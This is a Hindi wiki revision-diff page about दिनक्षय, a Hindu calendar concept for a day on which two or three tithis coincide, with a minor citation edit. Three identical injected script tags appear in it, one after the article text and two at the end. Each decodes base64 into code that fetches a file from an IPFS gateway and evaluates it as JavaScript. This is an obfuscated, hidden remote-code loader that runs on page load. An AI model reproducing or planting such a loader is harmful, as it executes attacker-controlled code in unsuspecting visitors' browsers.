Difference between revisions of "दिनक्षय"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - ")</ref" to "</ref")
 
Line 1: Line 1:
 
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
 
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
*जब एक ही बार में दो तिथियाँ पड़ जाती हैं तो दिनक्षय होता है।<ref>हेमाद्रि (काल, 676, [[पद्म पुराण]] से उद्धरण)</ref>  
+
*जब एक ही बार में दो तिथियाँ पड़ जाती हैं तो दिनक्षय होता है।<ref>हेमाद्रि (काल, 676, [[पद्म पुराण]] से उद्धरण</ref>  
 
*माधव के कालनिर्णय<ref>कालनिर्णय 260, [[वसिष्ठ]] से उद्धरण</ref> के अनुसार जब एक ही दिन में तीन तिथियों का स्पर्श हो जाता है तो दिनक्षय होता है, उस दिन उपवास वर्जित होता है, किन्तु दानों से सहस्र गुना पुण्य मिलता है।  
 
*माधव के कालनिर्णय<ref>कालनिर्णय 260, [[वसिष्ठ]] से उद्धरण</ref> के अनुसार जब एक ही दिन में तीन तिथियों का स्पर्श हो जाता है तो दिनक्षय होता है, उस दिन उपवास वर्जित होता है, किन्तु दानों से सहस्र गुना पुण्य मिलता है।  
 
{{प्रचार}}
 
{{प्रचार}}

Latest revision as of 12:49, 27 July 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • jab ek hi bar mean do tithiyaan p d jati haian to dinakshay hota hai.[1]
  • madhav ke kalanirnay[2] ke anusar jab ek hi din mean tin tithiyoan ka sparsh ho jata hai to dinakshay hota hai, us din upavas varjit hota hai, kintu danoan se sahasr guna puny milata hai.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. hemadri (kal, 676, padm puran se uddharan
  2. kalanirnay 260, vasishth se uddharan

any sanbandhit liank

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>